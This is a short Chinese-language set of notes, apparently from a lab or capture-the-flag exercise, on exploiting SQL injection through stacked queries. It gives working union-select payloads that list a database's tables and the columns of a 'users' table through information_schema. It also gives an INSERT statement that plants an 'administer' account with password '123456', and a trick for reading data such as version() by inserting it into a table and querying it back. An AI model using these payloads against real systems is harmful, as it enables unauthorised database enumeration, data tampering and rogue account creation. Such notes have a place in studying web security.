1、判断是否存在注入,然后使用堆叠语法进行检测
(可以注入多条命令)
2、使用联合查询获取当前库的所有表
-999' union select 1,2,(select group_concat(TABLE_NAME)from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)
3、获取表内字段,以users为例
-999' union select 1,2,(select group_concat(column_name)from information_schema.columns where TABLE_NAME='users' limit 1)
4、得到表内字段后,利用增删改语句改数据库
insert into users values(20,'administer','123456')
可以将version()或者其他信息插入后,再查询插入的那个数据,获取信息